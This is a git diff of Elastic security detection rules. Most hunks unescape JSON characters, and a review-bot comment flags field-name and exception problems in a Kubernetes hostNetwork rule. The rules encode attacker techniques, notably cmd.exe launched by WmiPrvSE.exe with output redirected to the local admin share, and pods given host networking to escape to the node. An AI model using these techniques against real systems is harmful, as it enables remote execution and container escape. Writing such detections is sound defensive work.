+ "query": "event.dataset : \"kubernetes.audit_logs\"\n and kubernetes.audit.annotations.authorization_k8s_io/decision:\"allow\"\n and kubernetes.audit.objectRef.resource:\"pods\"\n and kubernetes.audit.verb:(\"create\" or \"update\" or \"patch\")\n and kubernetes.audit.requestObject.spec.hostNetwork:true\n and not kubernetes.audit.requestObject.spec.containers.image: (\"docker.elastic.co/beats/elastic-agent:8.4.0\")\n",
+ "references": [
+ "https://research.nccgroup.com/2021/11/10/detection-engineering-for-kubernetes-clusters/#part3-kubernetes-detections",
+ "https://kubernetes.io/docs/concepts/security/pod-security-policy/#host-namespaces",
+ "https://bishopfox.com/blog/kubernetes-pod-privilege-escalation"
+ ],
+ "related_integrations": [
+ {
+ "package": "kubernetes",
+ "version": "^1.4.1"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.annotations.authorization_k8s_io/decision",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.objectRef.resource",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.requestObject.spec.containers.image",
+ "type": "text"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.requestObject.spec.hostNetwork",
+ "type": "boolean"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.verb",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "12cbf709-69e8-4055-94f9-24314385c27e",
+ "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.",
+ "severity": "medium",
+ "tags": [
+ "Data Source: Kubernetes",
+ "Tactic: Execution",
+ "Tactic: Privilege Escalation"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0004",
+ "name": "Privilege Escalation",
+ "reference": "https://attack.mitre.org/tactics/TA0004/"
+ },
+ "technique": [
+ {
+ "id": "T1611",
+ "name": "Escape to Host",
+ "reference": "https://attack.mitre.org/techniques/T1611/"
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0002",
+ "name": "Execution",
+ "reference": "https://attack.mitre.org/tactics/TA0002/"
+ },
+ "technique": [
+ {
+ "id": "T1610",
+ "name": "Deploy Container",
+ "reference": "https://attack.mitre.org/techniques/T1610/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 203
+ },
+ "id": "12cbf709-69e8-4055-94f9-24314385c27e_203",
+ "type": "security-rule"
+}
\ No newline at end of file
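Review bot: The false_positives guidance points operators at `kubernetes.audit.requestObject.spec.container.image`, but the query and required_fields use `kubernetes.audit.requestObject.spec.containers.image`; an exception built on the singular field would match nothing, so the text should read `\"kubernetes.audit.requestObject.spec.containers.image\"`. The built-in `not` clause pins a single image tag, `docker.elastic.co/beats/elastic-agent:8.4.0`, so any other agent version deployed with hostNetwork will alert, and an exclusion keyed only on image name is also weak evidence of trust; a namespace- or service-account-scoped rule exception is more robust than widening the image match. required_fields declares the image field as `text`; if that field is analyzed in the integration mapping, the exact-string match in the `not` clause may behave differently than a keyword comparison — worth confirming. The description also reads `This rules detects`, which should be `This rule detects`, and `shares the hosts IPC` should be `host's`.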
diff --git a/packages/security_detection_engine/kibana/security_rule/12de29d4-bbb0-4eef-b687-857e8a163870_1.json b/packages/security_detection_engine/kibana/security_rule/12de29d4-bbb0-4eef-b687-857e8a163870_1.json
index a06193adf6d..6af04606ff2 100644
--- a/packages/security_detection_engine/kibana/security_rule/12de29d4-bbb0-4eef-b687-857e8a163870_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/12de29d4-bbb0-4eef-b687-857e8a163870_1.json
@@ -44,7 +44,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/12de29d4-bbb0-4eef-b687-857e8a163870_2.json b/packages/security_detection_engine/kibana/security_rule/12de29d4-bbb0-4eef-b687-857e8a163870_2.json
index 43f6f643097..8751fd8b663 100644
--- a/packages/security_detection_engine/kibana/security_rule/12de29d4-bbb0-4eef-b687-857e8a163870_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/12de29d4-bbb0-4eef-b687-857e8a163870_2.json
@@ -45,7 +45,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_104.json b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_104.json
index 2a407c23782..ccf4be131eb 100644
--- a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_104.json
@@ -15,7 +15,7 @@
 "license": "Elastic License v2",
 "name": "Suspicious Cmd Execution via WMI",
 "note": "",
- "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2\u003e\u00261\", \"1\u003e\")\n",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2>&1\", \"1>\")\n",
 "related_integrations": [
 {
 "package": "endpoint",
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "12f07955-1674-44f7-86b5-c35da0a6f41a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_105.json b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_105.json
index a7f94a6bfda..da4a0ac83ac 100644
--- a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_105.json
@@ -15,7 +15,7 @@
 "license": "Elastic License v2",
 "name": "Suspicious Cmd Execution via WMI",
 "note": "",
- "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2\u003e\u00261\", \"1\u003e\")\n",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2>&1\", \"1>\")\n",
 "related_integrations": [
 {
 "package": "endpoint",
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "12f07955-1674-44f7-86b5-c35da0a6f41a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_106.json b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_106.json
index ff46204db71..73def81936c 100644
--- a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_106.json
@@ -15,7 +15,7 @@
 "license": "Elastic License v2",
 "name": "Suspicious Cmd Execution via WMI",
 "note": "",
- "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2\u003e\u00261\", \"1\u003e\")\n",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2>&1\", \"1>\")\n",
 "related_integrations": [
 {
 "package": "endpoint",
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "12f07955-1674-44f7-86b5-c35da0a6f41a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_107.json b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_107.json
index cb4eb386639..46a227fb95f 100644
--- a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_107.json
@@ -15,7 +15,7 @@
 "license": "Elastic License v2",
 "name": "Suspicious Cmd Execution via WMI",
 "note": "",
- "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2\u003e\u00261\", \"1\u003e\")\n",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2>&1\", \"1>\")\n",
 "related_integrations": [
 {
 "package": "endpoint",
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "12f07955-1674-44f7-86b5-c35da0a6f41a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_108.json b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_108.json
index d6067aa460e..03b184260eb 100644
--- a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_108.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Suspicious Cmd Execution via WMI",
- "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2\u003e\u00261\", \"1\u003e\")\n",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2>&1\", \"1>\")\n",
 "related_integrations": [
 {
 "package": "endpoint",
@@ -54,7 +54,7 @@
 ],
 "risk_score": 47,
 "rule_id": "12f07955-1674-44f7-86b5-c35da0a6f41a",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_102.json b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_102.json
index 5a6f27d7204..b4f966df3b9 100644
--- a/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_102.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 47,
 "rule_id": "1327384f-00f3-44d5-9a8c-2373ba071e92",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_103.json b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_103.json
index 41d9c678ccd..f674603ea5c 100644
--- a/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_103.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 47,
 "rule_id": "1327384f-00f3-44d5-9a8c-2373ba071e92",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_104.json b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_104.json
index 7667030e524..64e2a8aeb6d 100644
--- a/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_104.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 47,
 "rule_id": "1327384f-00f3-44d5-9a8c-2373ba071e92",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_105.json b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_105.json
index 7d20b49d077..b2017124c4e 100644
--- a/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_105.json
@@ -52,7 +52,7 @@
 ],
 "risk_score": 47,
 "rule_id": "1327384f-00f3-44d5-9a8c-2373ba071e92",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_102.json b/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_102.json
index 4bd2511ccb0..86ba6184271 100644
--- a/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_102.json
@@ -30,7 +30,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_103.json b/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_103.json
index 616fd66bbb0..9e48b426fde 100644
--- a/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_103.json
@@ -30,7 +30,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_104.json b/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_104.json
index 940d6c25ba6..2a86f3c5dfe 100644
--- a/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_104.json
@@ -44,7 +44,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/13e908b9-7bf0-4235-abc9-b5deb500d0ad_1.json b/packages/security_detection_engine/kibana/security_rule/13e908b9-7bf0-4235-abc9-b5deb500d0ad_1.json
index d012a452f21..513b9ccb52c 100644
--- a/packages/security_detection_engine/kibana/security_rule/13e908b9-7bf0-4235-abc9-b5deb500d0ad_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/13e908b9-7bf0-4235-abc9-b5deb500d0ad_1.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/141e9b3a-ff37-4756-989d-05d7cbf35b0e_101.json b/packages/security_detection_engine/kibana/security_rule/141e9b3a-ff37-4756-989d-05d7cbf35b0e_101.json
index cbab250ea30..afc3cec325a 100644
--- a/packages/security_detection_engine/kibana/security_rule/141e9b3a-ff37-4756-989d-05d7cbf35b0e_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/141e9b3a-ff37-4756-989d-05d7cbf35b0e_101.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -77,7 +77,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/141e9b3a-ff37-4756-989d-05d7cbf35b0e_102.json b/packages/security_detection_engine/kibana/security_rule/141e9b3a-ff37-4756-989d-05d7cbf35b0e_102.json
index c6f97e30c01..d77e13f6c83 100644
--- a/packages/security_detection_engine/kibana/security_rule/141e9b3a-ff37-4756-989d-05d7cbf35b0e_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/141e9b3a-ff37-4756-989d-05d7cbf35b0e_102.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -75,7 +75,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_100.json b/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_100.json
index 24bb9ebd7f0..9534edaabfb 100644
--- a/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_100.json
+++ b/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_100.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_101.json b/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_101.json
index 1f4b4c683a4..64184554835 100644
--- a/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_101.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_102.json b/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_102.json
index 33c3cacb585..08523e93ecf 100644
--- a/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_102.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_103.json b/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_103.json
index 2cafcacdeb1..42dfdf29c13 100644
--- a/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_103.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/14dab405-5dd9-450c-8106-72951af2391f_1.json b/packages/security_detection_engine/kibana/security_rule/14dab405-5dd9-450c-8106-72951af2391f_1.json
index f11774d3b4a..cbc21ca8a9a 100644
--- a/packages/security_detection_engine/kibana/security_rule/14dab405-5dd9-450c-8106-72951af2391f_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/14dab405-5dd9-450c-8106-72951af2391f_1.json
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/14dab405-5dd9-450c-8106-72951af2391f_2.json b/packages/security_detection_engine/kibana/security_rule/14dab405-5dd9-450c-8106-72951af2391f_2.json
index 1fa524ce552..753675ffce7 100644
--- a/packages/security_detection_engine/kibana/security_rule/14dab405-5dd9-450c-8106-72951af2391f_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/14dab405-5dd9-450c-8106-72951af2391f_2.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -76,7 +76,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/14de811c-d60f-11ec-9fd7-f661ea17fbce_201.json b/packages/security_detection_engine/kibana/security_rule/14de811c-d60f-11ec-9fd7-f661ea17fbce_201.json
index 634c36cadaa..4f41c70ed32 100644
--- a/packages/security_detection_engine/kibana/security_rule/14de811c-d60f-11ec-9fd7-f661ea17fbce_201.json
+++ b/packages/security_detection_engine/kibana/security_rule/14de811c-d60f-11ec-9fd7-f661ea17fbce_201.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
